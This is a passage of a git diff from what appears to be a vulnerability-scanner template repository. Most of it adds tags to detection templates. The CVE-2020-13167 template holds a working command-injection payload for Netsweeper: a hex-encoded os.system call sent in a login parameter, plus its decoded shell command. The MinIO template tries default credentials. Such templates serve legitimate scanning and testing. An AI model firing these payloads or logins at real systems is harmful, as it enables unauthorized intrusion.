++ technologies/dell/dell-idrac8-detect.yaml | 2 ++ technologies/dell/dell-idrac9-detect.yaml | 2 ++ technologies/favicon-detection.yaml | 1 + technologies/firebase-detect.yaml | 2 ++ technologies/google-storage.yaml | 1 + technologies/graphql-detect.yaml | 1 + technologies/graylog-api-browser.yaml | 1 + technologies/gunicorn-detect.yaml | 4 +++- technologies/harbor-detect.yaml | 2 ++ technologies/home-assistant.yaml | 1 + technologies/ilo-detect.yaml | 1 + technologies/jaspersoft-detect.yaml | 1 + technologies/jellyfin-detect.yaml | 4 ++++ technologies/jolokia.yaml | 3 +++ technologies/kibana-detect.yaml | 1 + technologies/kong-detect.yaml | 1 + technologies/liferay-portal-detect.yaml | 2 ++ technologies/linkerd-badrule-detect.yaml | 8 ++------ technologies/lotus-domino-version.yaml | 2 ++ technologies/metabase-detect.yaml | 4 ++++ technologies/mrtg-detect.yaml | 2 ++ technologies/netsweeper-webadmin-detect.yaml | 1 + technologies/nginx-version.yaml | 3 +++ technologies/nifi-detech.yaml | 3 +++ technologies/oidc-detect.yaml | 2 ++ technologies/openam-detection.yaml | 1 + technologies/pi-hole-detect.yaml | 3 +++ technologies/prtg-detect.yaml | 2 ++ technologies/redmine-cli-detect.yaml | 1 + technologies/s3-detect.yaml | 1 + technologies/shiro-detect.yaml | 6 +++++- technologies/springboot-actuator.yaml | 4 ++++ technologies/sql-server-reporting.yaml | 1 + technologies/telerik-fileupload-detect.yaml | 2 ++ technologies/terraform-detect.yaml | 2 ++ technologies/tomcat-detect.yaml | 8 +++++--- technologies/tor-socks-proxy.yaml | 2 ++ technologies/weblogic-detect.yaml | 1 + technologies/werkzeug-debugger-detect.yaml | 1 + vulnerabilities/lsoft/listserv_maestro_rce.yaml | 1 + .../other/cacti-weathermap-file-write.yaml | 1 + .../other/caucho-resin-info-disclosure.yaml | 1 + vulnerabilities/other/pmb-local-file-disclosure.yaml | 1 + vulnerabilities/other/vpms-auth-bypass.yaml | 2 +- vulnerabilities/other/zms-auth-bypass.yaml | 1 + 62 files changed, 124 insertions(+), 20 deletions(-) rename {technologies => exposed-panels}/prometheus-exposed-panel.yaml (65%) diff --git a/cves/2020/CVE-2020-12800.yaml b/cves/2020/CVE-2020-12800.yaml index 4a4a96bb69..8216d0e966 100644 --- a/cves/2020/CVE-2020-12800.yaml +++ b/cves/2020/CVE-2020-12800.yaml @@ -6,6 +6,7 @@ info: severity: critical description: The drag-and-drop-multiple-file-upload-contact-form-7 plugin before 1.3.3.3 for WordPress allows Unrestricted File Upload and remote code execution by setting supported_type to php% and uploading a .php% file. reference: https://github.com/amartinsec/CVE-2020-12800 + tags: cve,cve2020,wordpress,wp-plugin requests: - raw: diff --git a/cves/2020/CVE-2020-13167.yaml b/cves/2020/CVE-2020-13167.yaml index ffe6eb67a4..961d153f44 100644 --- a/cves/2020/CVE-2020-13167.yaml +++ b/cves/2020/CVE-2020-13167.yaml @@ -9,13 +9,15 @@ info: reference: - https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/ - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says + additional-fields: + hex-payload: 'echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out' requests: - method: GET path: - # Hex payload: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out - "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5" - "{{BaseURL}}/webadmin/out" + headers: Referer: "{{BaseURL}}/webadmin/admin/service_manager_data.php" diff --git a/cves/2021/CVE-2021-3377.yaml b/cves/2021/CVE-2021-3377.yaml index 77ded129f4..1b44686e3e 100644 --- a/cves/2021/CVE-2021-3377.yaml +++ b/cves/2021/CVE-2021-3377.yaml @@ -8,6 +8,7 @@ info: - https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27 author: geeknik severity: medium + tags: cve,cve2021,xss,npm requests: - raw: diff --git a/default-logins/minio/minio-default-password.yaml b/default-logins/minio/minio-default-password.yaml index 7d2b90fde6..12c46a6efe 100644 --- a/default-logins/minio/minio-default-password.yaml +++ b/default-logins/minio/minio-default-password.yaml @@ -4,23 +4,27 @@ info: name: Minio Default Password author: pikpikcu severity: medium + tags: default-login,minio requests: - method: POST path: - "{{BaseURL}}/minio/webrpc" + headers: Content-Type: application/json - body: | - {"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"} + + body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"}' - method: POST path: - "{{BaseURL}}/minio/webrpc" + headers: Content-Type: application/json - body: | - {"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"web.Login"} + + body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"web.Login"}' + matchers-condition: and matchers: diff --git a/technologies/prometheus-exposed-panel.yaml b/exposed-panels/prometheus-exposed-panel.yaml similarity index 65% rename from technologies/prometheus-exposed-panel.yaml rename to exposed-panels/prometheus-exposed-panel.yaml index b107509968..2cda5cc379 100644 --- a/technologies/prometheus-exposed-panel.yaml +++ b/exposed-panels/prometheus-exposed-panel.yaml @@ -1,9 +1,11 @@ id: prometheus-exposed-panel + info: name: Prometheus.io exposed panel author: organiccrap severity: low - # usually runs on port http/9090 + tags: panel,prometheus + requests: - method: GET path: @@ -12,4 +14,4 @@ requests: matchers: - type: word words: - - Prometheus Time Series Collection and Processing Server + - 'Prometheus Time Series Collection and Processing Server' \ No newline at end of file diff --git a/exposures/configs/yii-debugger.yaml b/exposures/configs/yii-debugger.yaml index 11232d47b1..e93bfbf58e 100644 --- a/exposures/configs/yii-debugger.yaml +++ b/exposures/configs/yii-debugger.yaml @@ -4,7 +4,8 @@ info: name: View Yii Debugger Information author: geeknik reference: https://yii2-framework.readthedocs.io/en/stable/guide/tool-debugger/ - severity: info + severity: low + tags: yii,debug,exposure requests: - method: GET @@ -16,11 +17,14 @@ requests: - "{{BaseURL}}/sapi/debug/default/view" redirects: true + max-redirects: 2 + stop-at-first-match: true matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "Yii Debugger" diff --git a/exposures/tokens/generic/shoppable-token.yaml b/exposures/tokens/generic/shoppable-token.yaml index 0f68803be2..0c3d4080a0 100644 --- a/exposures/tokens/generic/shoppable-token.yaml +++ b/exposures/tokens/generic/shoppable-token.yaml @@ -5,6 +5,7 @@ info: author: philippedelteil severity: info reference: https://ask.shoppable.com/knowledge/quick-start-api-guide + tags: exposure,shoppable,token requests: - method: GET diff --git a/misconfiguration/front-page-misconfig.yaml b/misconfiguration/front-page-misconfig.yaml index 7e982772b0..8d49471b46 100644 --- a/misconfiguration/front-page-misconfig.yaml +++ b/misconfiguration/front-page-misconfig.yaml @@ -5,6 +5,7 @@ info: author: JTeles,pikpikcu severity: info reference: https://docs.microsoft.com/en-us/archive/blogs/fabdulwahab/security-protecting-sharepoint-server-applications + tags: misconfig,exposure,frontpage requests: - method: GET diff --git a/technologies/artica-web-proxy-detect.yaml b/technologies/artica-web-proxy-detect.yaml index 82b19cfb2d..8fd487f5ee 100644 --- a/technologies/artica-web-proxy-detect.yaml +++ b/technologies/artica-web-proxy-detect.yaml @@ -1,18 +1,22 @@ id: artica-web-proxy-detect + info: name: Artica Web Proxy Detect author: dwisiswant0 severity: info + tags: tech,artica,proxy requests: - method: GET path: - "{{BaseURL}}/fw.login.php" + matchers-condition: and matchers: - type: word words: - "Welcome to the Artica Web Administration Interface" + - type: status status: - 200 \ No newline at end of file diff --git a/technologies/basic-auth-detection.yaml b/technologies/basic-auth-detection.yaml index 66132d212e..894c3892d0 100644 --- a/technologies/basic-auth-detection.yaml +++ b/technologies/basic-auth-detection.yaml @@ -4,6 +4,7 @@ info: name: Basic auth detection author: w4cky_ severity: info + tags: tech,basic-auth requests: - method: GET diff --git a/technologies/bigip-config-utility-detect.yaml b/technologies/bigip-config-utility-detect.yaml index 4d3c250775..78b2741369 100644 --- a/technologies/bigip-config-utility-detect.yaml +++ b/technologies/bigip-config-utility-detect.yaml @@ -4,6 +4,7 @@ info: name: BIG-IP Configuration Utility detected author: dwisiswant0 severity: info + tags: tech,bigip requests: - method: GET diff --git a/technologies/burp-api-detect.yaml b/technologies/burp-api-detect.yaml index 68a7000ee7..10cc8bcac8 100644 --- a/technologies/burp-api-detect.yaml +++ b/technologies/burp-api-detect.yaml @@ -5,6 +5,7 @@ info: author: joanbono severity: info reference: https://portswigger.net/burp/documentation/enterprise/api-reference + tags: burp,tech requests: - method: GET diff --git a/technologies/cacti-detect.yaml b/technologies/cacti-detect.yaml index 0a2a721928..9d1d018f12 100644 --- a/technologies/cacti-detect.yaml +++ b/technologies/cacti-detect.yaml @@ -4,6 +4,7 @@ info: author: geeknik description: Cacti is a complete network graphing solution -- https://www.cacti.net/ severity: info + tags: tech,cacti requests: - method: GET diff --git a/technologies/clockwork-php-page.yaml b/technologies/clockwork-php-page.yaml index 89ef10ba1b..a8537a2f36 100644 --- a/technologies/clockwork-php-page.yaml +++ b/technologies/clockwork-php-page.yaml @@ -1,9 +1,11 @@ id: clockwork-php-page + info: name: Clockwork PHP page exposure author: organiccrap severity: high reference: https://twitter.com/damian_89_/status/1250721398747791360 + tags: tech,clockwork requests: - method: GET diff --git a/technologies/cockpit-detect.yaml b/technologies/cockpit-detect.yaml index 30bf745acc..81dd323dc8 100644 --- a/technologies/cockpit-detect.yaml +++ b/technologies/cockpit-detect.yaml @@ -4,6 +4,7 @@ info: name: Detect Agentejo Cockpit author: dwisiswant0 severity: info + tags: tech,cockpit requests: - method: GET diff --git a/technologies/dell/dell-idrac6-detect.yaml b/technologies/dell/dell-idrac6-detect.yaml index 9d8bb598ff..6f3c118b88 100644 --- a/technologies/dell/dell-idrac6-detect.yaml +++ b/technologies/dell/dell-idrac6-detect.yaml @@ -1,9 +1,11 @@ id: dell-idrac6-detect + info: name: Detect Dell iDRAC6 author: kophjager007 description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. severity: info + tags: tech,dell requests: - method: GET diff --git a/technologies/dell/dell-idrac7-detect.yaml b/technologies/dell/dell-idrac7-detect.yaml index bddc00552b..220cfc4503 100644 --- a/technologies/dell/dell-idrac7-detect.yaml +++ b/technologies/dell/dell-idrac7-detect.yaml @@ -1,9 +1,11 @@ id: dell-idrac7-detect + info: name: Detect Dell iDRAC7 author: kophjager007 description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. severity: info + tags: tech,dell requests: - method: GET diff --git a/technologies/dell/dell-idrac8-detect.yaml b/technologies/dell/dell-idrac8-detect.yaml index e25dc371e6..2fd72b97aa 100644 --- a/technologies/dell/dell-idrac8-detect.yaml +++ b/technologies/dell/dell-idrac8-detect.yaml @@ -1,9 +1,11 @@ id: dell-idrac8-detect + info: name: Detect Dell iDRAC8 author: kophjager007 description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. severity: info + tags: tech,dell requests: - method: GET diff --git a/technologies/dell/dell-idrac9-detect.yaml b/technologies/dell/dell-idrac9-detect.yaml index 7677292de5..f339b04905 100644 --- a/technologies/dell/dell-idrac9-detect.yaml +++ b/technologies/dell/dell-idrac9-detect.yaml @@ -1,9 +1,11 @@ id: dell-idrac9-detect + info: name: Detect Dell iDRAC9 author: kophjager007 description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. severity: info + tags: tech,dell requests: - method: GET diff --git a/technologies/favicon-detection.yaml b/technologies/favicon-detection.yaml index 7394c9fff3..3cf1e620d8 100644 --- a/technologies/favicon-detection.yaml +++ b/technologies/favicon-detection.yaml @@ -10,6 +10,7 @@ info: - https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139 - https://github.com/devanshbatham/FavFreak - https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv + tags: tech,favicon requests: - method: GET diff --git a/technologies/firebase-detect.yaml b/technologies/firebase-detect.yaml index fe3ff98b30..5c22ef8819 100644 --- a/technologies/firebase-detect.yaml +++ b/technologies/firebase-detect.yaml @@ -5,11 +5,13 @@ info: author: organiccrap severity: low reference: http://ghostlulz.com/google-exposed-firebase-database/ + tags: tech,firebase requests: - method: GET path: - "{{BaseURL}}/.settings/rules.json?auth=FIREBASE_SECRET" + matchers: - type: word words: diff --git a/technologies/google-storage.yaml b/technologies/google-storage.yaml index 27f4814a5b..95963c6a8c 100644 --- a/technologies/google-storage.yaml +++ b/technologies/google-storage.yaml @@ -4,6 +4,7 @@ info: name: Google Bucket detection author: 0xTeles severity: info + tags: tech,gstorage,google,bucket requests: - method: GET diff --git a/technologies/graphql-detect.yaml b/technologies/graphql-detect.yaml index ef649b7d06..53d67b1326 100644 --- a/technologies/graphql-detect.yaml +++ b/technologies/graphql-detect.yaml @@ -4,6 +4,7 @@ info: name: GraphQL API Detection author: NkxxkN,ELSFA7110 severity: info + tags: tech,graphql requests: - method: POST diff --git a/technologies/graylog-api-browser.yaml b/technologies/graylog-api-browser.yaml index 6c93a114fa..98799a87c0 100644 --- a/technologies/graylog-api-browser.yaml +++ b/technologies/graylog-api-browser.yaml @@ -4,6 +4,7 @@ info: name: Detect Graylog REST API author: PR3R00T severity: info + tags: tech,graylog requests: - method: GET diff --git a/technologies/gunicorn-detect.yaml b/technologies/gunicorn-detect.yaml index 69f286e77b..56f5080384 100644 --- a/technologies/gunicorn-detect.yaml +++ b/technologies/gunicorn-detect.yaml @@ -1,9 +1,11 @@ id: gunicorn-detect + info: name: Detect Gunicorn Server author: joanbono description: Gunicorn Python WSGI HTTP Server for UNIX - https://github.com/benoitc/gunicorn severity: info + tags: tech,gunicorn requests: - method: GET @@ -22,4 +24,4 @@ requests: - type: kval part: header kval: - - Server + - Server \ No newline at end of file diff --git a/technologies/harbor-detect.yaml b/technologies/harbor-detect.yaml index e082b48acf..1ede65a8df 100644 --- a/technologies/harbor-detect.yaml +++ b/technologies/harbor-detect.yaml @@ -1,8 +1,10 @@ id: harbor-detect + info: name: Harbor Detect author: pikpikcu severity: info + tags: tech,harbor requests: - method: GET diff --git a/technologies/home-assistant.yaml b/technologies/home-assistant.yaml index 0522fc067b..dfb82e44b7 100644 --- a/technologies/home-assistant.yaml +++ b/technologies/home-assistant.yaml @@ -4,6 +4,7 @@ info: name: Detect Home Assistant author: fabaff severity: info + tags: tech,iot requests: - method: GET diff --git a/technologies/ilo-detect.yaml b/technologies/ilo-detect.yaml index 70f0fc1e8d..6eeff924eb 100644 --- a/technologies/ilo-detect.yaml +++ b/technologies/ilo-detect.yaml @@ -5,6 +5,7 @@ info: author: milo2012 severity: info description: Version of HP iLO + tags: tech,ilo requests: - method: GET diff --git a/technologies/jaspersoft-detect.yaml b/technologies/jaspersoft-detect.yaml index 7cafc9a84d..e26ad12b3f 100644 --- a/technologies/jaspersoft-detect.yaml +++ b/technologies/jaspersoft-detect.yaml @@ -4,6 +4,7 @@ info: name: Jaspersoft detected author: koti2 severity: info + tags: tech,jaspersoft requests: - method: GET diff --git a/technologies/jellyfin-detect.yaml b/technologies/jellyfin-detect.yaml index ae031c20ca..9b31eaed43 100644 --- a/technologies/jellyfin-detect.yaml +++ b/technologies/jellyfin-detect.yaml @@ -4,6 +4,7 @@ info: name: Jellyfin detected author: dwisiswant0 severity: info + tags: tech,jellyfin requests: - method: GET @@ -13,6 +14,8 @@ requests: - "{{BaseURL}}/index.html" - "{{BaseURL}}/web/index.html" - "{{BaseURL}}/web/manifest.json" + + stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -22,6 +25,7 @@ requests: - "The Free Software Media System" condition: or part: body + - type: status status: - 200 diff --git a/technologies/jolokia.yaml b/technologies/jolokia.yaml index f6b28ff6ad..957b898273 100644 --- a/technologies/jolokia.yaml +++ b/technologies/jolokia.yaml @@ -4,11 +4,13 @@ info: name: Jolokia Version Disclosure author: mavericknerd,dwisiswant0 severity: info + tags: tech,jolokia requests: - method: GET path: - '{{BaseURL}}/jolokia/version' + matchers-condition: and matchers: - type: word @@ -17,6 +19,7 @@ requests: - '"protocol":' - '"agent":' condition: and + - type: status status: - 200 diff --git a/technologies/kibana-detect.yaml b/technologies/kibana-detect.yaml index c35b4dd301..c64939b6df 100644 --- a/technologies/kibana-detect.yaml +++ b/technologies/kibana-detect.yaml @@ -4,6 +4,7 @@ info: name: Kibana Service Detection author: petruknisme severity: info + tags: tech,kibana requests: - method: GET diff --git a/technologies/kong-detect.yaml b/technologies/kong-detect.yaml index 6164d7c1cd..39e4d58bb7 100644 --- a/technologies/kong-detect.yaml +++ b/technologies/kong-detect.yaml @@ -4,6 +4,7 @@ info: author: geeknik description: The Cloud-Native API Gateway - https://github.com/Kong/kong severity: info + tags: tech,kong requests: - method: GET diff --git a/technologies/liferay-portal-detect.yaml b/technologies/liferay-portal-detect.yaml index ebf42ab88b..2a8de63c94 100644 --- a/technologies/liferay-portal-detect.yaml +++ b/technologies/liferay-portal-detect.yaml @@ -1,9 +1,11 @@ id: liferay-portal-detect + info: name: Liferay Portal Detection author: organiccrap,dwisiswant0 severity: info reference: https://github.com/mzer0one/CVE-2020-7961-POC # CVE-2020-7961: Liferay Portal Unauthenticated RCE + tags: tech,liferay requests: - method: GET diff --git a/technologies/linkerd-badrule-detect.yaml b/technologies/linkerd-badrule-detect.yaml index 5e445af239..0e1ef8ff57 100644 --- a/technologies/linkerd-badrule-detect.yaml +++ b/technologies/linkerd-badrule-detect.yaml @@ -1,15 +1,11 @@ id: linkerd-badrule-detect -# Detect the Linkerd service by overriding the delegation table with an invalid -# rule, the presence of the service is indicated by either: -# - a "Via: .. linkerd .." -# - a "l5d-err" and/or a "l5d-success" header -# - a literal error in the body - info: name: Linkerd detection via bad rule author: dudez severity: info + tags: tech,linkerd + reference: https://linkerd.io requests: - method: GET diff --git a/technologies/lotus-domino-version.yaml b/technologies/lotus-domino-version.yaml index 3af4529ee9..897d6fad2e 100644 --- a/technologies/lotus-domino-version.yaml +++ b/technologies/lotus-domino-version.yaml @@ -1,8 +1,10 @@ id: lotus-domino-version + info: name: Lotus Domino Version Extractor author: CasperGN severity: info + tags: tech,lotus requests: - method: GET path: diff --git a/technologies/metabase-detect.yaml b/technologies/metabase-detect.yaml index 2b8c4cec7d..3a865ab0e7 100644 --- a/technologies/metabase-detect.yaml +++ b/technologies/metabase-detect.yaml @@ -1,13 +1,17 @@ id: metabase-version-detect + info: name: Detect Metabase Version author: revblock description: If a Metabase instance is deployed on the target URL it will return a login page with the version number in the page source severity: info + tags: tech,metabase + requests: - method: GET path: - "{{BaseURL}}/auth/login" + matchers-condition: and matchers: diff --git a/technologies/mrtg-detect.yaml b/technologies/mrtg-detect.yaml index 19a062f6fa..96f95f15d6 100644 --- a/technologies/mrtg-detect.yaml +++ b/technologies/mrtg-detect.yaml @@ -1,9 +1,11 @@ id: mrtg-detect + info: name: Detect MRTG author: geeknik description: The Multi Router Traffic Grapher -- https://oss.oetiker.ch/mrtg/ severity: info + tags: tech,mrtg requests: - method: GET diff --git a/technologies/netsweeper-webadmin-detect.yaml b/technologies/netsweeper-webadmin-detect.yaml index cc107c6ddc..04b545b315 100644 --- a/technologies/netsweeper-webadmin-detect.yaml +++ b/technologies/netsweeper-webadmin-detect.yaml @@ -4,6 +4,7 @@ info: name: Netsweeper WebAdmin detected author: dwisiswant0 severity: info + tags: tech,netsweeper requests: - method: GET diff --git a/technologies/nginx-version.yaml b/technologies/nginx-version.yaml index 9674f616ed..302d5d3d19 100644 --- a/technologies/nginx-version.yaml +++ b/technologies/nginx-version.yaml @@ -1,9 +1,12 @@ id: nginx-version + info: name: nginx version detect author: philippedelteil description: Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets. severity: info + tags: tech,nginx + requests: - method: GET path: diff --git a/technologies/nifi-detech.yaml b/technologies/nifi-detech.yaml index 8e593cc440..837e4c43fd 100644 --- a/technologies/nifi-detech.yaml +++ b/technologies/nifi-detech.yaml @@ -4,6 +4,7 @@ info: name: Apache NiFi detect author: dwisiswant0 severity: info + tags: tech,apache,nifi requests: - method: GET @@ -15,6 +16,7 @@ requests: - "{{BaseURL}}/flow/registries" - "{{BaseURL}}/system-diagnostics" - "{{BaseURL}}/nifi-api/access/config" + matchers-condition: and matchers: - type: regex @@ -22,6 +24,7 @@ requests: - "supportsLogin" - "disconnectedNodeAcknowledged" - "(aggregate|node)Snapshots?" + - type: status status: - 200 diff --git a/technologies/oidc-detect.yaml b/technologies/oidc-detect.yaml index d8f65083d7..f87bf320d2 100644 --- a/technologies/oidc-detect.yaml +++ b/technologies/oidc-detect.yaml @@ -1,9 +1,11 @@ id: oidc-detect + info: name: Detect OpenID Connect provider author: jarijaas severity: info description: Detects OpenID Connect providers. See https://en.wikipedia.org/wiki/OpenID_Connect + tags: tech,oidc requests: - method: GET diff --git a/technologies/openam-detection.yaml b/technologies/openam-detection.yaml index b3c603dde0..fd1653f20f 100644 --- a/technologies/openam-detection.yaml +++ b/technologies/openam-detection.yaml @@ -4,6 +4,7 @@ info: name: Detect OpenAM and OpenSSO author: philippedelteil severity: info + tags: tech,openam requests: - method: GET diff --git a/technologies/pi-hole-detect.yaml b/technologies/pi-hole-detect.yaml index 0f5cbcb052..22d1a56dca 100644 --- a/technologies/pi-hole-detect.yaml +++ b/technologies/pi-hole-detect.yaml @@ -1,8 +1,10 @@ id: pi-hole-detect + info: name: pi-hole detector author: geeknik severity: info + tags: tech,pihole requests: - method: GET @@ -14,6 +16,7 @@ requests: - type: status status: - 200 + - type: word words: - "Pi-hole" diff --git a/technologies/prtg-detect.yaml b/technologies/prtg-detect.yaml index c57d90484d..c630eff289 100644 --- a/technologies/prtg-detect.yaml +++ b/technologies/prtg-detect.yaml @@ -1,9 +1,11 @@ id: prtg-detect + info: name: Detect PRTG author: geeknik description: Monitor all the systems, devices, traffic, and applications in your IT infrastructure -- https://www.paessler.com/prtg severity: info + tags: tech,prtg requests: - method: GET diff --git a/technologies/redmine-cli-detect.yaml b/technologies/redmine-cli-detect.yaml index 24a02349aa..8cb08b7888 100644 --- a/technologies/redmine-cli-detect.yaml +++ b/technologies/redmine-cli-detect.yaml @@ -4,6 +4,7 @@ info: author: geeknik description: A small command-line utility to interact with Redmine - https://pypi.org/project/Redmine-CLI/ severity: info + tags: tech,redmine requests: - method: GET diff --git a/technologies/s3-detect.yaml b/technologies/s3-detect.yaml index fe617373af..3ed37bb68e 100644 --- a/technologies/s3-detect.yaml +++ b/technologies/s3-detect.yaml @@ -4,6 +4,7 @@ info: name: Detect Amazon-S3 Bucket author: melbadry9 severity: info + tags: aws,s3,bucket,tech requests: - method: GET diff --git a/technologies/shiro-detect.yaml b/technologies/shiro-detect.yaml index 321f556a03..8353c48494 100644 --- a/technologies/shiro-detect.yaml +++ b/technologies/shiro-detect.yaml @@ -1,16 +1,20 @@ id: shiro-detect + info: name: Detect Shiro Framework author: AresX severity: info + tags: tech,shiro + requests: - method: GET path: - '{{BaseURL}}' headers: Cookie: rememberMe=123; + matchers: - type: word words: - - rememberMe=deleteMe + - 'rememberMe=deleteMe' part: header \ No newline at end of file diff --git a/technologies/springboot-actuator.yaml b/technologies/springboot-actuator.yaml index 6bc4c9e7a1..ebc7edbe1e 100644 --- a/technologies/springboot-actuator.yaml +++ b/technologies/springboot-actuator.yaml @@ -4,13 +4,17 @@ info: name: Detect Springboot Actuators author: that_juan_,dwisiswant0,wdahlenb severity: info + tags: tech,springboot,actuator requests: - method: GET path: + - "{{BaseURL}}" - "{{BaseURL}}/actuator" - "{{BaseURL}}/favicon.ico" + - "{{BaseURL}}/actuator/favicon.ico" + stop-at-first-match: true matchers-condition: or matchers: - type: word diff --git a/technologies/sql-server-reporting.yaml b/technologies/sql-server-reporting.yaml index 5b08ec1032..4b64c61e6f 100644 --- a/technologies/sql-server-reporting.yaml +++ b/technologies/sql-server-reporting.yaml @@ -4,6 +4,7 @@ info: name: Detect Microsoft SQL Server Reporting author: puzzlepeaches severity: info + tags: tech,micrsoft requests: - method: GET diff --git a/technologies/telerik-fileupload-detect.yaml b/technologies/telerik-fileupload-detect.yaml index 810cef7a8b..8f150d8b40 100644 --- a/technologies/telerik-fileupload-detect.yaml +++ b/technologies/telerik-fileupload-detect.yaml @@ -4,11 +4,13 @@ info: name: Detect Telerik Web UI fileupload handler author: organiccrap severity: info + tags: tech,telerik requests: - method: GET path: - "{{BaseURL}}/Telerik.Web.UI.WebResource.axd?type=rau" + matchers: - type: word words: diff --git a/technologies/terraform-detect.yaml b/technologies/terraform-detect.yaml index 8c4d3307df..4a458c77e2 100644 --- a/technologies/terraform-detect.yaml +++ b/technologies/terraform-detect.yaml @@ -1,9 +1,11 @@ id: terraform-detect + info: name: Detect Terraform Provider author: geeknik description: Write Infrastructure as Code - https://www.terraform.io/ severity: info + tags: tech,terraform requests: - method: GET diff --git a/technologies/tomcat-detect.yaml b/technologies/tomcat-detect.yaml index d5a164932d..5561dba63d 100644 --- a/technologies/tomcat-detect.yaml +++ b/technologies/tomcat-detect.yaml @@ -1,10 +1,12 @@ -id: tomcat-version-detect +id: tomcat-version + info: name: Detect Tomcat Version author: philippedelteil - description: If an Tomcat instance is deployed on the target URL, when we send a request for - a non existent resource we receive a Tomcat error page with version. + description: If an Tomcat instance is deployed on the target URL, when we send a request for a non existent resource we receive a Tomcat error page with version. severity: info + tags: tech,tomcat,apache + requests: - method: GET path: diff --git a/technologies/tor-socks-proxy.yaml b/technologies/tor-socks-proxy.yaml index ddbe880309..4957f092b8 100644 --- a/technologies/tor-socks-proxy.yaml +++ b/technologies/tor-socks-proxy.yaml @@ -1,8 +1,10 @@ id: tor-socks-proxy + info: name: Detect tor SOCKS proxy author: geeknik severity: info + tags: tech,tor,proxy requests: - method: GET diff --git a/technologies/weblogic-detect.yaml b/technologies/weblogic-detect.yaml index 6d290ac6f8..4effb62c55 100644 --- a/technologies/weblogic-detect.yaml +++ b/technologies/weblogic-detect.yaml @@ -4,6 +4,7 @@ info: name: Detect Weblogic author: bing0o severity: info + tags: tech,weblogic requests: - method: GET diff --git a/technologies/werkzeug-debugger-detect.yaml b/technologies/werkzeug-debugger-detect.yaml index f11eac5435..aa90f4c1a3 100644 --- a/technologies/werkzeug-debugger-detect.yaml +++ b/technologies/werkzeug-debugger-detect.yaml @@ -4,6 +4,7 @@ info: name: Werkzeug debugger console author: pdteam severity: info + tags: tech,werkzeug requests: - method: GET diff --git a/vulnerabilities/lsoft/listserv_maestro_rce.yaml b/vulnerabilities/lsoft/listserv_maestro_rce.yaml index 3f04c30a27..56b6d5f00f 100644 --- a/vulnerabilities/lsoft/listserv_maestro_rce.yaml +++ b/vulnerabilities/lsoft/listserv_maestro_rce.yaml @@ -8,6 +8,7 @@ info: reference: - https://www.securifera.com/advisories/sec-2020-0001/ - https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt + tags: rce,listserv,ognl requests: - method: GET diff --git a/vulnerabilities/other/cacti-weathermap-file-write.yaml b/vulnerabilities/other/cacti-weathermap-file-write.yaml index b8ebf42adb..04a5d1b654 100644 --- a/vulnerabilities/other/cacti-weathermap-file-write.yaml +++ b/vulnerabilities/other/cacti-weathermap-file-write.yaml @@ -5,6 +5,7 @@ info: author: pikpikcu severity: medium reference: https://www.freebuf.com/articles/system/125177.html + tags: injection,cacti requests: - method: GET diff --git a/vulnerabilities/other/caucho-resin-info-disclosure.yaml b/vulnerabilities/other/caucho-resin-info-disclosure.yaml index f4fa330ad9..04795427db 100644 --- a/vulnerabilities/other/caucho-resin-info-disclosure.yaml +++ b/vulnerabilities/other/caucho-resin-info-disclosure.yaml @@ -5,6 +5,7 @@ info: author: pikpikcu severity: info reference: https://www.exploit-db.com/exploits/27888 + tags: exposure,resin requests: - method: GET diff --git a/vulnerabilities/other/pmb-local-file-disclosure.yaml b/vulnerabilities/other/pmb-local-file-disclosure.yaml index 062d1759ab..a62783f871 100644 --- a/vulnerabilities/other/pmb-local-file-disclosure.yaml +++ b/vulnerabilities/other/pmb-local-file-disclosure.yaml @@ -5,6 +5,7 @@ info: author: dhiyaneshDk severity: high reference: https://www.exploit-db.com/exploits/49054 + tags: lfi,pmb requests: - method: GET diff --git a/vulnerabilities/other/vpms-auth-bypass.yaml b/vulnerabilities/other/vpms-auth-bypass.yaml index d0dcd358f6..6f612b4f78 100644 --- a/vulnerabilities/other/vpms-auth-bypass.yaml +++ b/vulnerabilities/other/vpms-auth-bypass.yaml @@ -5,7 +5,7 @@ info: author: dwisiswant0 severity: high reference: https://www.exploit-db.com/exploits/48877 - + tags: auth-bypass requests: - raw: - | diff --git a/vulnerabilities/other/zms-auth-bypass.yaml b/vulnerabilities/other/zms-auth-bypass.yaml index fbc1e03821..65c7df9984 100644 --- a/vulnerabilities/other/zms-auth-bypass.yaml +++ b/vulnerabilities/other/zms-auth-bypass.yaml @@ -5,6 +5,7 @@ info: author: dwisiswant0 severity: high reference: https://www.exploit-db.com/exploits/48880 + tags: auth-bypass,zms requests: - raw: From 8b36cf0f863818fb553ca7f2372dea63368d3da5 Mon Sep 17 00:00:00 2001 From: sandeep Date: 